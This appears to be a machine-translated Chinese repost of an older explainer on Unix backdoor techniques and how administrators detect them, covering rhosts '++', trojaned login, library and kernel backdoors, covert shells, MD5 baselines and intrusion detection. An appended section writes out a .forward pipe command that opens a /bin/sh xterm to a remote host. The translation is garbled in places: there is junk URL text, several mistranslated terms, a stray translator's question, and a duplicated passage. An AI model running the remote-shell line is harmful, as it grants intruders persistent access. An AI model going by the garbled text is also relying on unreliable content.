/按照正常的操作程序,程序員應該在軟件交付給用戶之前,去掉軟件模塊中的後門。但由於程序員的疏忽或故意將其留在程序中以便日後可以秘密訪問該程序,以便於對已完成的程序進行測試或維護,所以並未將其移除。
這樣,後門就有可能被程序作者偷偷利用,也有可能被少數別有用心的人通過窮舉搜索發現並利用。
/c?B2 % C3 % B4 % 3B % CA % C7 % 3B % BA % F3 % C3 % C5 & amp;URL =/Article % 5f show % 2 easp % 3f itec id % 3d 4777 & amp;b = 0 & ampa = 29 & amp用戶=百度
後門是什麽?
自從早期的計算機入侵者以來,他們壹直在試圖開發技術或後門,使他們能夠回到被入侵的系統。本文將討論許多常見的後門及其檢測方法,重點是Unix系統的後門。同時我們會討論壹些未來會出現的Windows NT的後門。本文將描述如何衡量入侵者使用的方法以及管理員如何阻止入侵者返回的基本知識等復雜內容。當管理員明白入侵者壹旦入侵就很難阻止他們時,他們會更積極地阻止第壹次入侵。本文試圖涉及大量流行的初級和高級入侵者制作後門的方法,但不會也不可能涵蓋所有可能的方法。
大多數入侵者的後門有兩三個目的:
即使管理員以類似的方式更改所有密碼來提高安全性,他仍然可以再次入侵,從而將再次被發現的可能性降到最低。大多數後門都試圖避開日誌,而且在大多數情況下,即使入侵者正在使用系統,他也無法表明自己在線。在某些情況下,如果入侵者認為管理員可能檢測到已安裝的後門,他們會將系統的漏洞作為唯壹的後門,反復攻擊機器。這不會引起管理員的註意。因此,在這種情況下,機器的脆弱性
密碼破解後門
這是入侵者使用的最早也是最古老的方法。它不僅可以訪問Unix機器,還可以通過破解密碼創建後門。這是使用弱密碼的帳戶。即使以後管理員屏蔽了入侵者的當前賬號,這些新賬號仍有可能成為再次入侵的後門。在大多數情況下,入侵者會尋找未使用的弱密碼帳戶,然後更難更改它們。當管理員查找密碼較弱的帳戶時,他將找不到密碼被修改過的帳戶。
rhosts ++後門
在聯網的Unix機器中,Rsh和Rlogin等服務使用基於rhosts文件中的主機名的簡單身份驗證方法。用戶可以輕松更改設置,無需密碼即可進入。入侵者只需將“++”輸入到能夠訪問它的用戶的rhosts文件中。任何人都可以從任何地方進入這個帳戶,而不需要密碼。尤其是當主目錄通過NFS對外共享時,入侵者對此更感興趣。這些賬號也成為了入侵者再次入侵的後門。許多人更喜歡使用Rsh,因為它通常缺乏日誌記錄能力。許多管道
管理人員經常檢查“++”,所以入侵者實際上是從網上設置了另壹個賬號的主機名和用戶名,不容易被發現。
校驗和和時間戳後門
在早期,許多入侵者用自己的木馬程序替換二進制文件。系統管理員可以根據*時間戳和系統校驗和程序,比如Unix中的sum程序,判斷壹個二進制文件是否被更改過。入侵者開發了壹種新技術,可以將特洛伊木馬文件的時間戳與原始文件同步。實現方法如下:首先將系統時鐘設置回原來的文件時間,然後將木馬文件的時間調整到系統時間。壹旦二進制特洛伊木馬文件與原始文件精確同步,系統時間就可以設置回當前時間。sum程序是基於CRC校驗的,很簡單。
作弊了。入侵者設計了壹個程序,可以將特洛伊木馬的校驗和調整為原始文件的校驗和。MD5是大多數人推薦的,目前沒有人能騙過MD5使用的算法。
登錄後門
在Unix中,登錄程序通常用於驗證telnet用戶的密碼。入侵者獲取login.c的原始代碼,並對其進行修改,使其在比較輸入密碼和存儲密碼之前檢查後門密碼。如果用戶輸入後門密碼,它會忽略管理員設置的密碼,讓妳直接開進去。這將允許入侵者進入任何帳戶。甚至根。因為後門密碼在用戶實際登錄並登錄到utmp和wtmp之前創建了壹個訪問,所以入侵者可以在不暴露帳戶的情況下登錄並獲得外殼。管理員註意到這個後門後,他會
使用“strings”命令搜索登錄程序以查找文本信息。很多情況下會泄露後門密碼。入侵者將開始加密或更好地隱藏密碼,這將使字符串命令無效。所以更多的管理員使用MD5校驗和來檢測這個後門。
遠程登錄後門
當用戶telnet到系統時,偵聽端口的inetd服務接受連接,然後將其交給in.telnetd,後者運行登錄。有些入侵者知道管理員會檢查登錄是否被修改過,就開始修改in.telnetd,in.telnetd裏面有壹些對用戶信息的測試,比如用戶用的是什麽終端?典型的終端設置是Xterm或VT100。入侵者可以做這樣的後門,當終端設置為“letmein”時,會生成壹個沒有任何驗證的外殼。入侵者對某些服務做了後門,產生了來自特定源端口的連接。
生個殼
服務後門
幾乎所有的網絡服務都被入侵者利用了後門。有很多版本的finger,rsh,rexec,rlogin,ftp,甚至inetd等等。其中壹些只是連接到TCP端口的外殼,可以通過後門密碼訪問。這些程序有時會使用荊棘。ucp等未使用的服務作為新服務添加到inetd.conf中。管理員應該非常註意那些正在運行的服務,並用MD5檢查原始服務程序。
克朗喬布後門
Unix上的Cronjob可以調度特定的程序根據時間表運行。入侵者可以加入後門外殼程序,在1AM到2AM之間運行,因此他們可以每晚訪問壹個小時。他們還可以檢查經常在Cronjob中運行的合法程序,同時放入後門。
庫後門
幾乎所有的UNIX系統都使用* * *來共享庫。* * *重用相同的函數並減少代碼長度。有些入侵者在_crypt.c和_ crypt.c這樣的函數中做了後門,login.c這樣的程序調用crypt(),使用後門密碼時會生成壹個shell。因此,即使管理員用MD5檢查登錄程序,仍然可以生成後門函數。而且很多管理員也不會去查庫有沒有被後門。許多入侵者都有壹個問題:壹些管理員對所有東西都進行MD5檢查。壹種方法是讓入侵者後門open()和文件訪問函數。後門功能讀取原始文件,但執行木馬後門程序。所以MD5讀取這些文件時,校驗和是沒問題的。但是,當系統運行時,木馬版本將被執行。甚至木馬庫本身也能躲過MD5驗證。對於管理員來說,有壹個方法可以找到後門,就是靜態連接MD5驗證程序,然後運行。靜態連接程序不會使用木馬***享受庫。
內核後門
內核是Unix工作的核心。用於庫避免MD5驗證的方法也適用於內核級,即使靜態連接也無法識別。有好後門的內核是管理員最難找到的。好在內核的後門程序並不是唾手可得,大家都知道它實際傳播的範圍有多廣。
文件系統後門
入侵者需要將他們的掠奪物或數據存儲在服務器上,管理員無法找到。入侵者的文章通常包括漏洞腳本工具、後門集、嗅探器日誌、電子郵件的備用部分、原始代碼等。有時候為了防止管理員發現這麽大的文件,入侵者需要修復“ls”、“du”、“fsck”來隱藏特定的目錄和文件。在壹個非常低的水平上,入侵者制造了這個漏洞:以專有格式切下硬盤的壹部分,並將其指示為壞扇區。因此,入侵者只能使用特殊工具來訪問這些隱藏文件。普通的
對於管理員來說,很難在這些“壞扇區”中找到文件系統,它也確實存在。
行李箱後門
在PC世界,很多病毒都藏在根區,殺毒軟件就是檢查根區有沒有被改。在Unix下,大多數管理員不會檢查根區域中的軟件,因此壹些入侵者會在根區域中留下壹些後門。
隱藏進程後門
入侵者通常想隱藏他們正在運行的程序。這類程序通常是密碼破解程序和嗅探器。有很多方法可以實現這壹點,這是比較通用的:在編寫程序時,修改妳的argv[]使它看起來像其他進程名。妳可以像in.syslog壹樣重命名sniffer程序,然後執行它。因此,當管理員用“ps”檢查正在運行的進程時,會出現標準服務名。您可以修改庫函數,使其看起來像其他進程名。
“ps”無法顯示所有進程。妳可以在中斷驅動中嵌入壹個後門或者程序,這樣它就不會出現在進程表中。使用這種技術的後門的壹個例子是amod.tar.gz:
e根通過壹個神奇的密碼發送到登錄。
Ic -修改了ifconfig,從輸出中刪除了PROMISC標誌。
ps: -隱藏進程。
Ns -修改了netstat以隱藏與某些機器的連接。
Ls -隱藏某些目錄和文件。
隱藏妳的硬盤上有多少空間被使用。
ls5 -隱藏某些文件和目錄。
網絡訪問後門
入侵者不僅想在系統中隱藏他們的蹤跡,還想隱藏他們的網絡流量。這些網絡流量後門有時允許入侵者通過防火墻進行訪問。有很多網絡後門程序,可以讓入侵者在沒有普通服務的情況下建立某個端口號。因為這是通過非標準網絡端口的流量,管理員可能會忽略入侵者的足跡。這種後門通常使用TCP、UDP和ICMP,但也可能是其他類型的消息。
TCP Shell後門
入侵者可能在不受防火墻阻擋的高TCP端口設置這些TCP外殼後門。在許多情況下,他們使用密碼來防止管理員在連接後立即看到shell訪問。管理員可以使用netstat命令來檢查當前的連接狀態、正在監聽的端口以及當前連接的上下文。通常,這些後門可以讓入侵者避開TCP包裝技術。這些後門可以放在SMTP端口,許多防火墻允許電子郵件通過。
UDP Shell後門
管理員經常關註TCP連接,觀察其奇怪的情況,但是UDP Shell的後門並沒有這樣的連接,所以netstat無法顯示入侵者的訪問痕跡。許多防火墻設置為允許UDP消息(如DNS)通過。通常,入侵者將UDP Shell放在該端口,並被允許通過防火墻。
ICMP外殼後門
Ping是通過發送和接收ICMP數據包來檢測機器活動的常用方法之壹。許多防火墻允許外部人員Ping其內部的機器。入侵者可以將數據放入ping ICMP數據包,在被ping的機器之間形成壹個外殼通道。管理員可能會註意到大量的ping數據包,但入侵者不會暴露身份,除非他查看數據包中的數據。
加密連接
管理員可能設置了嗅探器試圖訪問壹些數據,但是當入侵者加密網絡後門時,無法判斷兩臺機器之間的傳輸內容。
windows操作系統
因為Windows NT不能像Unix壹樣輕易允許多個用戶訪問壹臺機器,所以入侵者很難闖入Windows NT,安裝後門,從那裏發動攻擊。因此,您將更頻繁地看到來自Unix的各種網絡攻擊。當WindowsNT改進多用戶技術時,入侵者將更頻繁地使用Windows NT。如果這壹天真的到來,很多Unix後門技術都會移植到Windows NT上,管理員就可以坐等入侵者的到來了。今天,Windows NT已經有了telnet守護進程。通過網絡後門,入侵者發現在Windows NT中安裝它們是可行的。(帶網絡流量
後門,他們非常害怕入侵者安裝在Windows NT上。:(
解決
後門技術越先進,管理員就越難判斷入侵者是否入侵了後者,是否被成功攔截。
估計
首先要做的是主動準確的估計自己網絡的漏洞,從而確定漏洞的存在並修復。許多商業工具被用來幫助掃描和檢查網絡和系統的漏洞。如果只安裝供應商的安全補丁,很多公司的安全性會大大提高。
MD5基線
系統(安全)掃描的壹個重要因素是MD5校驗和基線。MD5基線是在黑客入侵之前由幹凈的系統建立的。壹旦黑客入侵建立了後門然後建立了基線,後門就被合並了。壹些公司被入侵,系統被放了幾個月的後門。所有系統備份大多包含後門。當公司發現黑客,請求後援除掉後門時,所有的努力都白費了,因為他們在恢復系統的同時也恢復了後門。應該在入侵前完成。
入侵檢測
隨著各種組織在互聯網上沖浪並允許連接到他們自己的壹些機器,入侵檢測變得越來越重要。過去,大多數入侵檢測技術都是基於日誌的。最新的入侵檢測系統技術(IDS)是基於實時攔截和網絡流量安全分析的。最新的IDS技術可以瀏覽DNS UDP報文,判斷是否符合DNS協議的要求。如果數據不符合協議,可以將相同的原理應用於ICMP數據包,以檢查數據是否符合協議要求,或者是否加載了加密的shell會話。
從光盤啟動
壹些管理員考慮從光盤開始,從而消除入侵者在光盤上做後門的可能性。這種方法的問題是,實施的成本和時間足夠企業面對。
警告
由於安全領域的快速變化,每天都有新的漏洞發布,入侵者也在不斷設計新的攻擊方式,安裝後門。沒有安全的技術。請記住,沒有簡單的防守,只有不懈的努力!
(請註意,沒有任何防禦是萬無壹失的,也沒有什麽可以替代
勤奮的關註。這句話怎麽翻譯?:( )
-
您可能需要添加:
。正向後門
在Unix機器上,將命令放入。轉發文件也被
恢復訪問的常用方法。對於帳戶“用戶名”
答。轉發文件可以按如下方式構建:
\用戶名
| "/usr/local/x 11/bin/xterm-disp hacksys . other . DOM:0.0-e
/bin/sh "
這種方法的變化包括系統郵件的改變
別名文件(通常位於/etc/aliases)。註意到
這是壹個簡單的排列,更高級的可以運行簡單的
來自轉發文件的腳本,可以通過
stdin(經過較小的預處理)。
附言:以上方法對進入壹家公司也很有用
mailhub(假設上有壹個共享的主目錄FS
& ampnbs & gt
客戶端和服務器)。
& gt使用smrsh可以有效地否定這個後門(雖然它相當
& gt如果妳允許像elm的過濾器或
& gt可以自己運行程序的procmail...).
您可能需要添加:
前門後門
將命令放入。在Unix下轉發文件是重新獲得訪問權常用方法。的。賬戶“用戶名”的轉發可設置如下:
\用戶名
| "/usr/local/x 11/bin/xterm-disp hacksys . other . DOM:0.0-e/bin/sh "
這種方法的變體包括更改系統郵件的別名文件(通常位於/etc/aliases中)。請註意,這只是壹個簡單的轉換。更高級的人可以從。forward在標準輸入上執行任意命令(在壹小部分預處理之後)。>使用smrsh可以有效地阻止這種後門程序(雖然elm的filter或Procmail >: Class程序可能有問題)...)
參考資料:
zhidao.baidu.com